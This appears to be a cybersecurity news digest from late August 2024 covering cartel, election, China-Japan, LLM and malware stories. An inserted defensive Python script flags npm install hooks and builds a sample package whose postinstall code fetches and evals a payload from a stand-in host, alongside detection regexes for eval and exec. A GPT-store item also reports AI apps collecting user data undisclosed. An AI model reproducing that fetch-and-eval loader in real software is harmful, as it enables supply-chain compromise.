Daily Drop (853): | Citrine Sleet | APT42 | DPRK: NPM | SlowTempest | CN and JP | GPT Apps: Collect Data | GlobalProtect VPN | LLMs | US Election | Zetas Founder |
08-31-24
Saturday, Aug 31 2024 // (IG): BB // ShadowNews // Coffee for Bob
Measures of Effectiveness (MoE):
MoEs are used to assess how well a system or operation achieves its intended goals. They are qualitative or quantitative metrics that reflect the success of achieving desired outcomes. For example, in a cybersecurity context, an MoE could be the reduction in successful cyber-attacks after implementing new security protocols.
Results: We are seeing an uptick in “163.com”, “189.com” and “QQ” subscribers.
Mexican Drug Lord and Zetas Founder Released from U.S. Prison, Faces Deportation
Bottom Line Up Front (BLUF): Osiel Cárdenas, the notorious leader of Mexico's Gulf Cartel and founder of the ultra-violent Zetas, has been released from a U.S. prison and handed over to immigration authorities. His release raises concerns about his potential deportation to Mexico, where he faces outstanding charges.
Analyst Comments: The release of Osiel Cárdenas marks a significant moment in Mexico's ongoing struggle with cartel violence. As the architect of the Zetas' brutal tactics, Cárdenas played a pivotal role in shaping the violent landscape of Mexico's drug war. His potential return to Mexico could reignite tensions, especially if he seeks to regain influence in the cartel world. The situation also underscores the complex relationship between U.S. and Mexican law enforcement in managing high-profile criminals whose actions have had far-reaching consequences on both sides of the border.
FROM THE MEDIA: On August 30, 2024, Osiel Cárdenas, former leader of Mexico's Gulf Cartel and founder of the Zetas, was released from a U.S. prison after serving part of his 25-year sentence. Cárdenas, who was extradited to the U.S. in 2007, is now in the custody of U.S. Immigration and Customs Enforcement (ICE) and may be deported to Mexico, where he faces additional charges. Cárdenas is infamous for his role in escalating cartel violence through the Zetas, a group known for its extreme brutality and expansion into various criminal enterprises beyond drug trafficking. His release and possible return to Mexico are being closely watched by both U.S. and Mexican authorities, given the potential implications for regional security.
READ THE STORY: Reuters
The 2024 US Election and Immigration: Key Strategies and Implications
Bottom Line Up Front (BLUF): As the 2024 US election approaches, immigration has emerged as a critical issue, with Kamala Harris and Donald Trump presenting starkly different strategies. Harris aims to shift the narrative by attacking Republican policies on border security, while Trump has pledged mass deportations if re-elected. Both approaches will significantly impact the political landscape and voter sentiment on immigration.
Analyst Comments: Immigration remains a challenging issue for Democrats, often seen as a vulnerability due to Republican emphasis on border security. Kamala Harris's attempt to take a more aggressive stance might resonate with voters concerned about the current state of the border, but it risks alienating the Democratic base if perceived as too harsh. On the other hand, Trump's promise of mass deportations is a continuation of his hardline stance, appealing to his core supporters but raising legal and logistical questions about the feasibility of such actions. The effectiveness of these strategies will likely hinge on how well each campaign can balance tough rhetoric with practical solutions.
READ THE STORY: Economist
Japan Protests Chinese Naval Incursion Amid Rising Tensions
Bottom Line Up Front (BLUF): Japan has lodged a formal protest with China after a Chinese naval survey vessel entered Japanese territorial waters, marking the second incursion within a week. The incident adds to growing tensions as Japan bolsters its defense capabilities in response to increasing Chinese military activities near its borders and around Taiwan.
Analyst Comments: The repeated incursions by Chinese military vessels into Japanese waters reflect a broader strategy by Beijing to assert its territorial claims and test Japan's response. These actions are likely to heighten Japan's sense of urgency regarding its defense buildup and could further strain Sino-Japanese relations, especially as Tokyo continues to align more closely with its Western allies in countering China's regional ambitions.
FROM THE MEDIA: On August 31, 2024, Japan detected a Chinese naval survey vessel in its territorial waters off Kagoshima Prefecture, which departed after two hours. This marks the tenth such intrusion by Chinese vessels in the past year, prompting Japan to express its "strong concern and protest" to China. The incident follows an earlier airspace violation by a Chinese military aircraft, which Tokyo described as "utterly unacceptable." These repeated incursions are contributing to increased military tensions in the region as Japan undertakes a significant defense buildup to deter potential threats from China.
READ THE STORY: Reuters
Examining the True Capabilities and Limitations of Large Language Models
Bottom Line Up Front (BLUF): A recent study challenges the notion that Large Language Models (LLMs) truly understand language, arguing that these models are sophisticated tools that simulate language but do not capture the full spectrum of human linguistic behavior. The research calls for a more cautious approach to the deployment and regulation of LLMs, particularly in critical areas like medicine and education.
Analyst Comments: The growing use of LLMs in various industries, coupled with the hyperbolic claims about their capabilities, raises significant ethical and practical concerns. This study underscores the importance of understanding the fundamental differences between human cognition and AI-driven language processing. As the AI industry continues to push the boundaries, there is a pressing need for rigorous testing and regulation to prevent the misuse of these technologies in domains where human lives and social dynamics are at stake.
FROM THE MEDIA: The study, led by Abeba Birhane and Marek McGann, critiques the current enthusiasm surrounding LLMs like OpenAI's models, which are often portrayed as approaching human-like understanding of language. The researchers argue that LLMs, while impressive in their engineering, lack the embodied and social context that defines human language. They warn that treating these models as true language understanding systems could have serious implications for policymaking, regulation, and the broader society. The study advocates for a more grounded perspective on what LLMs can and cannot do, especially as they are increasingly integrated into high-stakes areas like healthcare and legal services.
READ THE STORY: The Register
New Malware Impersonates Palo Alto VPN in Sophisticated Middle East Cyber Campaign
Bottom Line Up Front (BLUF): Cybersecurity researchers have uncovered a new malware campaign targeting Middle East users by disguising itself as Palo Alto Networks' GlobalProtect VPN tool. The malware, capable of executing remote PowerShell commands and exfiltrating data, poses a significant threat by blending into legitimate network traffic.
Analyst Comments: The discovery of this malware highlights the growing sophistication of cyber threats in the Middle East, where attackers are increasingly using advanced techniques to evade detection. The use of a well-known VPN brand like Palo Alto's GlobalProtect to deliver malware indicates a targeted approach aimed at deceiving users into compromising their systems. This tactic, combined with the malware’s ability to evade sandboxing solutions, suggests the involvement of highly skilled threat actors, potentially linked to espionage or state-sponsored activities.
FROM THE MEDIA: Researchers at Trend Micro have identified a new malware strain that mimics the Palo Alto Networks GlobalProtect VPN to target users in the Middle East, particularly in the UAE. The malware is distributed via a setup.exe file, which installs a backdoor allowing attackers to execute commands, upload and download files, and exfiltrate sensitive data to a command-and-control server. The campaign’s use of a fake VPN portal, "sharjahconnect," to disguise malicious activity underscores the threat’s ability to blend in with normal network traffic, making detection and mitigation more challenging.
READ THE STORY: THN
Iran's Fake Recruiting Sites Used to Identify and Target Double Agents
Bottom Line Up Front (BLUF): A newly uncovered Iranian cyber campaign has used fake recruiting websites and social media accounts to identify and target Farsi-speaking individuals, including potential double agents and dissidents. The operation, believed to be linked to Iran's Islamic Revolutionary Guard Corps (IRGC), involved gathering sensitive personal information through fraudulent job offers.
Analyst Comments: This campaign underscores Iran's continued use of cyber tactics to identify and neutralize perceived threats both domestically and internationally. The operation's sophisticated use of social engineering and fake online infrastructure reflects a broader strategy by the Iranian regime to tighten internal security and counter external influences. The overlap with tactics used by known Iranian cyber units like APT42 further suggests a coordinated effort to bolster national security through digital surveillance.
FROM THE MEDIA: Mandiant researchers have revealed that Iranian actors, likely affiliated with the IRGC, operated fake recruiting websites and social media accounts to trap Farsi-speaking targets. The campaign, running from 2017 to March 2024, aimed to gather personal information from individuals in Iran and abroad by luring them with fake job offers related to Israel. The collected data could be used for further surveillance or direct action against these individuals, raising significant concerns about both privacy and personal safety. The operation's connection to known Iranian cyber activities highlights its potential state-sponsored origins.
READ THE STORY: The Register // THN
North Korean Hackers Target Developers with Malicious npm Packages in Cryptocurrency Heist Campaign
Bottom Line Up Front (BLUF): North Korean cyber actors have been deploying malicious npm packages to target software developers, aiming to infiltrate systems, steal sensitive data, and hijack cryptocurrency assets. The campaign, known as "Contagious Interview," leverages obfuscated JavaScript and fake job interview scenarios to trick developers into installing malware.
Analyst Comments: This latest North Korean cyber operation underscores the evolving threat landscape in the software supply chain, particularly for developers working in cryptocurrency and tech industries. By exploiting trusted platforms like npm, attackers can stealthily distribute malware, emphasizing the need for rigorous security protocols in software development environments. The use of social engineering tactics combined with sophisticated malware delivery illustrates the increasing complexity of state-sponsored cyber threats.
FROM THE MEDIA: Between August 12 and 27, 2024, North Korean hackers, linked to the group "Famous Chollima," launched a new wave of attacks targeting developers via npm packages such as "temp-etherscan-api" and "helmet-validate." These packages embed malicious JavaScript to execute code from a remote domain, aiming to steal data from cryptocurrency wallets and establish persistence on infected systems. This campaign is part of a broader strategy where the attackers pose as recruiters in fake job interviews, tricking developers into installing malware. The campaign's reach has been extensive, affecting over 100 companies globally, particularly in the technology, financial, and media sectors.
READ THE STORY: THN
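The story above describes the mechanism at a high level: an npm package carries an install-time hook and JavaScript that fetches code from a remote domain and executes it. The script below is an added example, not code from the digest or from any of the researchers it cites; it is a defender-side triage check that unpacks that pattern into two signals a reviewer can grep for before `npm install` runs: lifecycle scripts in `package.json`, and a single file that both reaches the network and dynamically evaluates a string. The package names, file contents and the `example.invalid` URL are constructed for the demo and are not the real packages named in the report.

```python
"""Triage an unpacked npm package for install hooks and remote code loading.

Added example (not from the original digest). Sample packages are constructed
in a temporary directory so the script runs offline.
"""
import json
import re
import tempfile
from pathlib import Path

# npm runs these automatically on install; a reviewer should see them before installing.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Signal 1: something that reaches out to the network.
REMOTE_FETCH = re.compile(r"\b(?:https?\.(?:get|request)|fetch|axios\.(?:get|post))\s*\(")
# Signal 2: something that executes an arbitrary string at runtime.
DYNAMIC_EXEC = re.compile(r"\b(?:eval|new\s+Function|vm\.runInThisContext|child_process\.exec\w*)\s*\(")
# Any literal URL, reported so an analyst can check it against known infrastructure.
REMOTE_URL = re.compile(r'''https?://[^\s'"`]+''')


def audit_package(pkg_dir: Path) -> dict:
    """Return findings for one unpacked npm package directory."""
    findings = {"lifecycle_scripts": {}, "suspicious_files": [], "remote_urls": []}
    manifest = pkg_dir / "package.json"
    if manifest.exists():
        scripts = json.loads(manifest.read_text()).get("scripts", {})
        findings["lifecycle_scripts"] = {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}
    for js in sorted(pkg_dir.rglob("*.js")):
        text = js.read_text(errors="ignore")
        findings["remote_urls"].extend(REMOTE_URL.findall(text))
        # Fetch and dynamic exec in the same file is the "download and run" shape.
        if REMOTE_FETCH.search(text) and DYNAMIC_EXEC.search(text):
            findings["suspicious_files"].append(str(js.relative_to(pkg_dir)))
    return findings


def verdict(findings: dict) -> str:
    """Map findings to a simple gate: block, review, or allow."""
    hooks = bool(findings["lifecycle_scripts"])
    loader = bool(findings["suspicious_files"])
    if hooks and loader:
        return "block"      # runs on install and loads remote code
    if hooks or loader:
        return "review"     # one signal alone is common in legitimate packages
    return "allow"


def build_demo_packages(root: Path) -> dict:
    """Write one constructed suspicious package and one benign package under root."""
    bad = root / "demo-etherscan-helper"   # constructed name, not the real package
    bad.mkdir()
    (bad / "package.json").write_text(json.dumps({
        "name": "demo-etherscan-helper", "version": "1.0.0",
        "scripts": {"postinstall": "node index.js"},
    }))
    (bad / "index.js").write_text(
        "const https = require('https');\n"
        "https.get('https://example.invalid/payload.js', res => {\n"
        "  let body = '';\n"
        "  res.on('data', c => body += c);\n"
        "  res.on('end', () => eval(body));\n"
        "});\n"
    )
    good = root / "demo-helmet-utils"      # constructed name, not the real package
    good.mkdir()
    (good / "package.json").write_text(json.dumps({
        "name": "demo-helmet-utils", "version": "1.0.0",
        "scripts": {"test": "node test.js"},
    }))
    (good / "index.js").write_text(
        "module.exports = function validate(h) { return typeof h === 'object'; };\n"
    )
    return {"suspicious": bad, "benign": good}


def run_demo() -> dict:
    """Build both sample packages and return their findings and verdicts."""
    root = Path(tempfile.mkdtemp(prefix="npm-audit-"))
    results = {}
    for label, pkg in build_demo_packages(root).items():
        f = audit_package(pkg)
        results[label] = {"findings": f, "verdict": verdict(f)}
    return results


if __name__ == "__main__":
    for label, r in run_demo().items():
        print(label, r["verdict"], json.dumps(r["findings"], indent=2))
```

The two-signal rule is deliberate: many legitimate packages have a `postinstall` script (native builds), and many legitimately call `fetch`, so either alone is only a review flag; the combination of an install hook with a file that both downloads and evaluates code is the shape the report describes and is what the script blocks. Real triage would run this against the tarball `npm pack` produces rather than the repository, since the published artifact is what executes.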
Study Reveals GPT Apps Collect Data in Violation of Privacy Policies
Bottom Line Up Front (BLUF): A recent study by researchers from Washington University reveals that many GPT apps in OpenAI's GPT Store are collecting user data, including sensitive information, without proper disclosure, violating OpenAI's privacy policies. The study also highlights security risks associated with these practices, especially in third-party Actions used within the GPT ecosystem.
Analyst Comments: The findings raise significant concerns about the privacy and security practices within the GPT ecosystem, particularly regarding third-party developers. The lack of transparency and inconsistent enforcement of OpenAI's privacy policies could lead to data breaches or misuse, especially when sensitive information like passwords is involved. As the use of AI-driven applications grows, stronger oversight and better privacy controls will be crucial to protect users.
FROM THE MEDIA: Researchers examined nearly 120,000 GPTs and over 2,500 Actions in OpenAI's GPT Store, finding that many apps collect data such as passwords, personal information, and browsing history without proper disclosure. Only a small fraction of these Actions disclosed their data collection practices, raising concerns about privacy violations. The study found that some apps could potentially expose sensitive data across multiple services due to shared memory space, increasing the risk of data leaks. Despite OpenAI's removal of some non-compliant GPTs, the researchers argue that current measures are insufficient to safeguard user data in this rapidly expanding ecosystem.
READ THE STORY: The Register
CrowdStrike Addresses Global IT Outage Caused by Software Update Flaw
Bottom Line Up Front (BLUF): Cybersecurity firm CrowdStrike is urgently working to resolve a major IT outage that affected Microsoft Windows users worldwide. The issue, stemming from a defect in a software update, caused widespread disruptions, including system crashes and downtime across various sectors.
Analyst Comments: This incident highlights the risks associated with software updates in complex IT environments, where interactions between different systems can lead to unforeseen consequences. CrowdStrike’s swift acknowledgment and efforts to address the problem are crucial, but the scale of the outage and its impact on critical infrastructure like healthcare and transportation underscore the importance of rigorous testing and contingency planning in cybersecurity operations.
FROM THE MEDIA: On July 19, 2024, CrowdStrike identified a defect in a recent software update that led to a global IT outage, particularly affecting Microsoft Windows users. The issue, which caused systems to crash and go offline, prompted a coordinated response from government and industry sectors. CrowdStrike CEO George Kurtz emphasized that this was not a security breach but a software conflict, and the company is actively working to restore services. The outage has had significant repercussions, especially in the UK, where it disrupted healthcare services and transportation systems. The situation is ongoing, with CrowdStrike continuing to deploy fixes and assist affected customers.
READ THE STORY: Yahoo
"SlowTempest" Espionage Campaign Targets Chinese Entities with Advanced Malware
Bottom Line Up Front (BLUF): Securonix researchers have identified a sophisticated cyber-espionage operation, dubbed "SlowTempest," targeting individuals and organizations within China. The campaign involves the use of phishing emails containing malicious .zip files designed to infiltrate systems, exfiltrate sensitive data, and maintain long-term access for potential sabotage.
Analyst Comments: The "SlowTempest" campaign highlights the increasing complexity of cyber threats within China, focusing on persistent access and data collection. The attackers' use of advanced tools and techniques, such as custom malware and exploitation frameworks, suggests the involvement of seasoned cybercriminals, potentially linked to state-sponsored activities. This operation's focus on Chinese-speaking targets and infrastructure reflects a deep understanding of the region, raising concerns about internal security and the effectiveness of traditional defense mechanisms.
FROM THE MEDIA: The SlowTempest espionage campaign, uncovered by Securonix, demonstrates a coordinated effort to infiltrate high-profile sectors in China. The attackers used phishing emails with malicious .zip files to bypass antivirus systems and gain access to networks, where they established persistence for over two weeks. Despite no definitive link to known threat groups, the campaign's use of tools like CobaltStrike and advanced lateral movement techniques indicates a high level of expertise. The ongoing nature of these attacks suggests a broader, unresolved threat to Chinese businesses and government entities.
READ THE STORY: The Record
DPRK: FudModule Rootkit in Financial Sector Attack
Bottom Line Up Front (BLUF): North Korean threat group Citrine Sleet has exploited a zero-day vulnerability in Google's Chromium browser to deploy the FudModule rootkit, targeting the cryptocurrency industry. The attack involved a sophisticated multi-stage process, including social engineering and leveraging multiple vulnerabilities to gain deep system access.
Analyst Comments: The use of a Chromium zero-day by North Korean actors underscores the increasing complexity and coordination in state-sponsored cyberattacks. This operation, targeting the lucrative cryptocurrency sector, highlights the persistent threat these groups pose, particularly in exploiting newly discovered vulnerabilities before they are widely patched. The deployment of the FudModule rootkit, known for its advanced stealth capabilities, further illustrates the strategic intent to establish long-term, undetected access for financial theft and espionage.
FROM THE MEDIA: Citrine Sleet, a North Korean threat actor linked to the Lazarus Group, exploited a type confusion vulnerability (CVE-2024-7971) in Chromium’s V8 engine to deploy the FudModule rootkit. The attack began with a social engineering campaign leading victims to a malicious site, which triggered the exploit and allowed the attackers to gain remote code execution. Once inside, the FudModule rootkit provided persistent access by manipulating kernel security mechanisms, enabling the attackers to evade detection and maintain control over compromised systems. Despite a patch being released by Google, the attackers successfully exploited the vulnerability, demonstrating the rapid and sophisticated nature of modern cyber threats.
READ THE STORY: The Cyberexpress // THN
Items of interest
Green Berets Employ Cyber Warfare in Swift Response 2024 Exercise
Bottom Line Up Front (BLUF): During the NATO Swift Response 2024 exercise in Sweden, U.S. Army Green Berets utilized advanced cyber technology to breach a target building's security systems. This integration of cyber warfare into special operations highlights the evolving capabilities of elite forces in modern combat scenarios.
Analyst Comments: The use of cyber technology by Green Berets during Swift Response 2024 marks a significant evolution in special operations, emphasizing the importance of integrating digital and physical tactics. This exercise illustrates the increasing relevance of cyber capabilities in military operations, particularly for elite units like the Green Berets. Their ability to infiltrate and disrupt enemy networks in real-time reflects broader trends in modern warfare, where cyberspace is becoming as crucial as traditional battlefields.
FROM THE MEDIA: In Swift Response 2024, Green Berets from the 10th Special Forces Group showcased their proficiency in cyber warfare by hacking into a target building's Wi-Fi network in Sweden. After gaining control over the building's security systems, another team parachuted into the area, completed the infiltration, and left behind signal-jamming equipment. This exercise demonstrates the merging of cyber and physical operations, a critical capability in today's military strategy, especially within NATO's collaborative defense framework.
READ THE STORY: The Register // Army
3 Levels of WiFi Hacking (Video)
FROM THE MEDIA: WiFi hacking is very much still a thing performed by both white hat and black hat hackers. In this video, NetworkChuck will demonstrate how hackers might hack a WiFi network from three different levels or perspectives: a Noob, a Hipster and a Pro. All of the wireless attacks demonstrated in this video are real and possible. The purpose of this video is NOT to equip an army of skiddies but to educate people on how WiFi hacks occur and what they can do to protect themselves and the networks they run.
The World's Most Powerful Cyber Armies (Video)
FROM THE MEDIA: Discover the advanced forces shaping the digital battlefield. This in-depth analysis delves into the elite cyber armies protecting nations and wielding unprecedented power in cyberspace. Uncover the strategies, technologies, and key players driving these formidable entities as they navigate the complex world of cyber warfare. Perfect for cybersecurity professionals, tech enthusiasts, and anyone interested in the future of digital defense.
The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.